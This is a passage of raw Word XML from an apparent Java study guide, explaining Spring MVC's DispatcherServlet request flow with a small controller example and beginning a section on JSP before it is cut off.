        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="328E1F7D" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Once</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00193873" w:rsidRPr="00CE4B95" w14:paraId="67C9D4F5" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A0750A" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Cleanup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06B6E531" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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GC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31833323" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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JVM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="114D913F" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>After destroy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44FBA840" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="33EF8CB4">
          <v:rect id="_x0000_i1917" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1867F" w14:textId="4F54E14D" w:rsidR="00496E5A" w:rsidRPr="00CE4B95" w:rsidRDefault="00496E5A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="389" w:name="_Toc196307869"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a dispatcher servlet?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>
    </w:p>
    <w:p w14:paraId="511E9E90" w14:textId="633B1C96" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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DispatcherServlet in Spring MVC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB5DCEC" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>front controller</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> architecture. It handles all incoming HTTP requests and routes them to the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controllers</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E915B6" w14:textId="77777777" w:rsidR="0038563B"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DC4D120">
          <v:rect id="_x0000_i1918" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2C800" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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DispatcherServlet Lifecycle (High-Level Flow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF7C84" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1755"/>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Client sends HTTP request</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → /some-path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788CFF6" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1755"/>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Request hits the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769EDB84" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1755"/>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DispatcherServlet uses </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find the matching controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47585E46" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1755"/>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Calls the controller’s method (e.g., @GetMapping, @PostMapping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24257F12" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1755"/>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Controller returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D888EA2" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1755"/>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DispatcherServlet passes the model to the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4C66E" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1755"/>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View (like JSP, Thymeleaf, JSON) is rendered and sent back to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCD1AD1" w14:textId="77777777" w:rsidR="0038563B"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97A5A6">
          <v:rect id="_x0000_i1919" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8A87E3" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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How it Works Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BDFA3" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1756"/>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Registered in web.xml (legacy)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto-configured in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F57B1" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1756"/>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Intercepts requests based on URL pattern like / or /api/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3F539" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1756"/>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Works with components like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C034FF7" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1756"/>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HandlerMapping – Finds the appropriate controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261FA2C7" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1756"/>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lastRenderedPageBreak/>
        <w:t>HandlerAdapter – Invokes the controller method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B48370" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1756"/>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ViewResolver – Resolves logical view names into actual views (e.g., JSP page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76231CAD" w14:textId="77777777" w:rsidR="0038563B"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EBA8FE0">
          <v:rect id="_x0000_i1920" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C101381" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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Think of it as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC9230A" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traffic cop</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that receives all web requests and </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dispatches</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them to the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, processes the result, and renders the final response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252150A" w14:textId="77777777" w:rsidR="0038563B"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62E2B31">
          <v:rect id="_x0000_i1921" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FE1BBD" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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Example (Spring Boot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7B0C49" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37931234" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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RequestMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E2BE2" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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public class HelloController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26565286" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A894DA" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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GetMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5663558C" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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public String sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD5BA58" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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return "Hello, Siddhant!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A9DAF" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6002A3" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A520CAA" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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When the request comes to /hello, the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> takes care of routing it to sayHello() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BCD3B6" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003856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43BC4BA">
          <v:rect id="_x0000_i1922" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="111457B2" w14:textId="21D06D9C" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="009E74CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="390" w:name="_Toc196307870"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is JSP</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="390"/>
    </w:p>
    <w:p w14:paraId="15BEE930" w14:textId="7852EC6B" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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What is JSP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5804833E" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B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JSP (JavaServer Pages)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server-side technology</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to create </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic web pages</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java-based web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402BD331" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B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It's basically </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTML + Java</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where you can embed Java code inside special JSP tags to dynamically generate content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C51C754" w14:textId="77777777" w:rsidR="00F363B4"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2DDD537">
          <v:rect id="_x0000_i1923" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1858DB21" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4"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Key Features of JSP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB2CF9" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1757"/>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Extension:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
